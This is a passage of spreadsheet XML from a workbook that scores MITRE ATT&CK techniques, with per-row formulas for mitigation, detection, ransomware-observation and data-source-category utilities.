        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M467" s="37">
        <v>1</v>
      </c>
      <c r="N467" s="56">
        <v>0</v>
      </c>
      <c r="O467" s="56">
        <v>3</v>
      </c>
      <c r="P467" s="56">
        <v>3</v>
      </c>
      <c r="Q467" s="56">
        <v>0</v>
      </c>
      <c r="R467" s="57"/>
      <c r="S467" s="57"/>
      <c r="T467" s="57"/>
      <c r="U467" s="57"/>
      <c r="V467" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W467" s="37">
        <v>0</v>
      </c>
      <c r="X467" s="37">
        <v>0</v>
      </c>
      <c r="Y467" s="37">
        <v>0</v>
      </c>
      <c r="Z467" s="37">
        <v>6</v>
      </c>
      <c r="AA467" s="37">
        <v>0.06</v>
      </c>
      <c r="AB467" s="37">
        <v>0.06</v>
      </c>
      <c r="AC467" s="37"/>
      <c r="AD467" s="50" t="s">
        <v>1636</v>
      </c>
      <c r="AE467" s="37" t="str" cm="1">
        <f t="array" ref="AE467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD467)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF467" s="37">
        <v>463</v>
      </c>
      <c r="AG467" s="37" t="str" cm="1">
        <f t="array" ref="AG467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH467" s="37">
        <v>463</v>
      </c>
      <c r="AI467" s="37" t="str" cm="1">
        <f t="array" ref="AI467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ467" s="37">
        <v>463</v>
      </c>
      <c r="AK467" s="37" t="str" cm="1">
        <f t="array" ref="AK467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL467" s="37">
        <v>463</v>
      </c>
      <c r="AM467" s="37" t="str" cm="1">
        <f t="array" ref="AM467">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD467)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN467" s="37">
        <v>0</v>
      </c>
      <c r="AO467" s="37"/>
      <c r="AP467" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ467" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>697.08095238095245</v>
      </c>
      <c r="AR467" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS467" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT467" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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68" spans="1:47" ht="34">
      <c r="A468" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B468" s="37">
        <f t="shared" si="7"/>
        <v>185.70000000000002</v>
      </c>
      <c r="C468" s="37" t="s">
        <v>3806</v>
      </c>
      <c r="D468" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E468" s="37" t="s">
        <v>3807</v>
      </c>
      <c r="F468" s="37">
        <v>1</v>
      </c>
      <c r="G468" s="37">
        <v>1</v>
      </c>
      <c r="H468" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I468" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J468" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K468" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L468" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M468" s="37">
        <v>0</v>
      </c>
      <c r="N468" s="56">
        <v>0</v>
      </c>
      <c r="O468" s="56">
        <v>0</v>
      </c>
      <c r="P468" s="56">
        <v>0</v>
      </c>
      <c r="Q468" s="56">
        <v>0</v>
      </c>
      <c r="R468" s="57"/>
      <c r="S468" s="57"/>
      <c r="T468" s="57"/>
      <c r="U468" s="57"/>
      <c r="V468" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W468" s="37"/>
      <c r="X468" s="37"/>
      <c r="Y468" s="37"/>
      <c r="Z468" s="37"/>
      <c r="AA468" s="37"/>
      <c r="AB468" s="37"/>
      <c r="AC468" s="37"/>
      <c r="AD468" s="50" t="s">
        <v>3808</v>
      </c>
      <c r="AE468" s="37" t="str" cm="1">
        <f t="array" ref="AE468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD468)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF468" s="37">
        <v>464</v>
      </c>
      <c r="AG468" s="37" t="str" cm="1">
        <f t="array" ref="AG468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH468" s="37">
        <v>464</v>
      </c>
      <c r="AI468" s="37" t="str" cm="1">
        <f t="array" ref="AI468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ468" s="37">
        <v>464</v>
      </c>
      <c r="AK468" s="37" t="str" cm="1">
        <f t="array" ref="AK468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL468" s="37">
        <v>464</v>
      </c>
      <c r="AM468" s="37" t="str" cm="1">
        <f t="array" ref="AM468">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD468)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN468" s="37"/>
      <c r="AO468" s="37"/>
      <c r="AP468" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ468" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>61.900000000000006</v>
      </c>
      <c r="AR468" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS468" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT468" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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69" spans="1:47" ht="68">
      <c r="A469" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B469" s="37">
        <f t="shared" si="7"/>
        <v>891.8028090952381</v>
      </c>
      <c r="C469" s="37" t="s">
        <v>1637</v>
      </c>
      <c r="D469" s="50" t="s">
        <v>1638</v>
      </c>
      <c r="E469" s="37"/>
      <c r="F469" s="37">
        <v>1</v>
      </c>
      <c r="G469" s="37">
        <v>0</v>
      </c>
      <c r="H469" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I469" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J469" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K469" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L469" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M469" s="37">
        <v>6.3500000000000004E-4</v>
      </c>
      <c r="N469" s="56">
        <v>0</v>
      </c>
      <c r="O469" s="56">
        <v>3</v>
      </c>
      <c r="P469" s="56">
        <v>3</v>
      </c>
      <c r="Q469" s="56">
        <v>0</v>
      </c>
      <c r="R469" s="57" t="s">
        <v>1639</v>
      </c>
      <c r="S469" s="57">
        <v>16</v>
      </c>
      <c r="T469" s="57" t="s">
        <v>1640</v>
      </c>
      <c r="U469" s="57">
        <v>26</v>
      </c>
      <c r="V469" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.42857123809523812</v>
      </c>
      <c r="W469" s="37">
        <v>42</v>
      </c>
      <c r="X469" s="37">
        <v>0.76363599999999998</v>
      </c>
      <c r="Y469" s="37">
        <v>0.76363599999999998</v>
      </c>
      <c r="Z469" s="37">
        <v>6</v>
      </c>
      <c r="AA469" s="37">
        <v>0.06</v>
      </c>
      <c r="AB469" s="37">
        <v>0.06</v>
      </c>
      <c r="AC469" s="37"/>
      <c r="AD469" s="50" t="s">
        <v>1641</v>
      </c>
      <c r="AE469" s="37" t="str" cm="1">
        <f t="array" ref="AE469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD469)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF469" s="37">
        <v>465</v>
      </c>
      <c r="AG469" s="37" t="str" cm="1">
        <f t="array" ref="AG469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD469)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH469" s="37">
        <v>465</v>
      </c>
      <c r="AI469" s="37" t="str" cm="1">
        <f t="array" ref="AI469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD469)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ469" s="37">
        <v>465</v>
      </c>
      <c r="AK469" s="37" t="str" cm="1">
        <f t="array" ref="AK469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD469)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL469" s="37">
        <v>465</v>
      </c>
      <c r="AM469" s="37" t="str" cm="1">
        <f t="array" ref="AM469">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD469)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN469" s="37">
        <v>0</v>
      </c>
      <c r="AO469" s="37">
        <v>0</v>
      </c>
      <c r="AP469" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ469" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>297.26760303174603</v>
      </c>
      <c r="AR469" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS469" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT469" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU46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70" spans="1:47" ht="34">
      <c r="A470" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B470" s="37">
        <f t="shared" si="7"/>
        <v>741.55907976190474</v>
      </c>
      <c r="C470" s="37" t="s">
        <v>1642</v>
      </c>
      <c r="D470" s="50" t="s">
        <v>1638</v>
      </c>
      <c r="E470" s="37" t="s">
        <v>1643</v>
      </c>
      <c r="F470" s="37">
        <v>1</v>
      </c>
      <c r="G470" s="37">
        <v>0</v>
      </c>
      <c r="H470" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I470" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J470" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K470" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L470" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M470" s="37">
        <v>0</v>
      </c>
      <c r="N470" s="56">
        <v>0</v>
      </c>
      <c r="O470" s="56">
        <v>1</v>
      </c>
      <c r="P470" s="56">
        <v>0</v>
      </c>
      <c r="Q470" s="56">
        <v>0</v>
      </c>
      <c r="R470" s="57" t="s">
        <v>1644</v>
      </c>
      <c r="S470" s="57">
        <v>13</v>
      </c>
      <c r="T470" s="57" t="s">
        <v>1645</v>
      </c>
      <c r="U470" s="57">
        <v>23</v>
      </c>
      <c r="V470" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.34761880952380952</v>
      </c>
      <c r="W470" s="37">
        <v>36</v>
      </c>
      <c r="X470" s="37">
        <v>0.65454500000000004</v>
      </c>
      <c r="Y470" s="37">
        <v>0.65454500000000004</v>
      </c>
      <c r="Z470" s="37">
        <v>1</v>
      </c>
      <c r="AA470" s="37">
        <v>0.01</v>
      </c>
      <c r="AB470" s="37">
        <v>0.01</v>
      </c>
      <c r="AC470" s="37"/>
      <c r="AD470" s="50" t="s">
        <v>1646</v>
      </c>
      <c r="AE470" s="37" t="str" cm="1">
        <f t="array" ref="AE470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF470" s="37">
        <v>466</v>
      </c>
      <c r="AG470" s="37" t="str" cm="1">
        <f t="array" ref="AG470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH470" s="37">
        <v>466</v>
      </c>
      <c r="AI470" s="37" t="str" cm="1">
        <f t="array" ref="AI470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD470)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ470" s="37">
        <v>466</v>
      </c>
      <c r="AK470" s="37" t="str" cm="1">
        <f t="array" ref="AK470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL470" s="37">
        <v>466</v>
      </c>
      <c r="AM470" s="37" t="str" cm="1">
        <f t="array" ref="AM470">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD470)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN470" s="37">
        <v>0</v>
      </c>
      <c r="AO470" s="37">
        <v>0</v>
      </c>
      <c r="AP470" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ470" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>247.18635992063491</v>
      </c>
      <c r="AR470" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS470" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT470" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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71" spans="1:47" ht="51">
      <c r="A471" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B471" s="37">
        <f t="shared" si="7"/>
        <v>342.64955500000008</v>
      </c>
      <c r="C471" s="37" t="s">
        <v>1647</v>
      </c>
      <c r="D471" s="50" t="s">
        <v>1638</v>
      </c>
      <c r="E471" s="37" t="s">
        <v>1648</v>
      </c>
      <c r="F471" s="37">
        <v>1</v>
      </c>
      <c r="G471" s="37">
        <v>0</v>
      </c>
      <c r="H471" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I471" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J471" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K471" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L471" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M471" s="37">
        <v>0</v>
      </c>
      <c r="N471" s="56">
        <v>0</v>
      </c>
      <c r="O471" s="56">
        <v>0</v>
      </c>
      <c r="P471" s="56">
        <v>0</v>
      </c>
      <c r="Q471" s="56">
        <v>0</v>
      </c>
      <c r="R471" s="57" t="s">
        <v>1649</v>
      </c>
      <c r="S471" s="57">
        <v>2</v>
      </c>
      <c r="T471" s="57" t="s">
        <v>1650</v>
      </c>
      <c r="U471" s="57">
        <v>12</v>
      </c>
      <c r="V471" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W471" s="37">
        <v>14</v>
      </c>
      <c r="X471" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y471" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z471" s="37">
        <v>0</v>
      </c>
      <c r="AA471" s="37">
        <v>0</v>
      </c>
      <c r="AB471" s="37">
        <v>0</v>
      </c>
      <c r="AC471" s="37"/>
      <c r="AD471" s="50" t="s">
        <v>1651</v>
      </c>
      <c r="AE471" s="37" t="str" cm="1">
        <f t="array" ref="AE471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD471)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF471" s="37">
        <v>467</v>
      </c>
      <c r="AG471" s="37" t="str" cm="1">
        <f t="array" ref="AG471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD471)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH471" s="37">
        <v>467</v>
      </c>
      <c r="AI471" s="37" t="str" cm="1">
        <f t="array" ref="AI471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD471)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ471" s="37">
        <v>467</v>
      </c>
      <c r="AK471" s="37" t="str" cm="1">
        <f t="array" ref="AK471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD471)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL471" s="37">
        <v>467</v>
      </c>
      <c r="AM471" s="37" t="str" cm="1">
        <f t="array" ref="AM471">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD471)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN471" s="37">
        <v>0</v>
      </c>
      <c r="AO471" s="37">
        <v>0</v>
      </c>
      <c r="AP471" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ471" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>114.21651833333335</v>
      </c>
      <c r="AR471" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS471" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT471" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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72" spans="1:47" ht="51">
      <c r="A472" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B472" s="37">
        <f t="shared" si="7"/>
        <v>1047.9884520000001</v>
      </c>
      <c r="C472" s="37" t="s">
        <v>1652</v>
      </c>
      <c r="D472" s="50" t="s">
        <v>1638</v>
      </c>
      <c r="E472" s="37" t="s">
        <v>1653</v>
      </c>
      <c r="F472" s="37">
        <v>1</v>
      </c>
      <c r="G472" s="37">
        <v>0</v>
      </c>
      <c r="H472" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I472" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J472" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K472" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L472" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M472" s="37">
        <v>0</v>
      </c>
      <c r="N472" s="56">
        <v>0</v>
      </c>
      <c r="O472" s="56">
        <v>9</v>
      </c>
      <c r="P472" s="56">
        <v>17</v>
      </c>
      <c r="Q472" s="56">
        <v>33</v>
      </c>
      <c r="R472" s="57" t="s">
        <v>1654</v>
      </c>
      <c r="S472" s="57">
        <v>12</v>
      </c>
      <c r="T472" s="57" t="s">
        <v>1655</v>
      </c>
      <c r="U472" s="57">
        <v>12</v>
      </c>
      <c r="V472" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.50952399999999998</v>
      </c>
      <c r="W472" s="37">
        <v>24</v>
      </c>
      <c r="X472" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Y472" s="37">
        <v>0.43636399999999997</v>
      </c>
      <c r="Z472" s="37">
        <v>59</v>
      </c>
      <c r="AA472" s="37">
        <v>0.59</v>
      </c>
      <c r="AB472" s="37">
        <v>0.59</v>
      </c>
      <c r="AC472" s="37"/>
      <c r="AD472" s="50" t="s">
        <v>1656</v>
      </c>
      <c r="AE472" s="37" t="str" cm="1">
        <f t="array" ref="AE472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD472)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF472" s="37">
        <v>468</v>
      </c>
      <c r="AG472" s="37" t="str" cm="1">
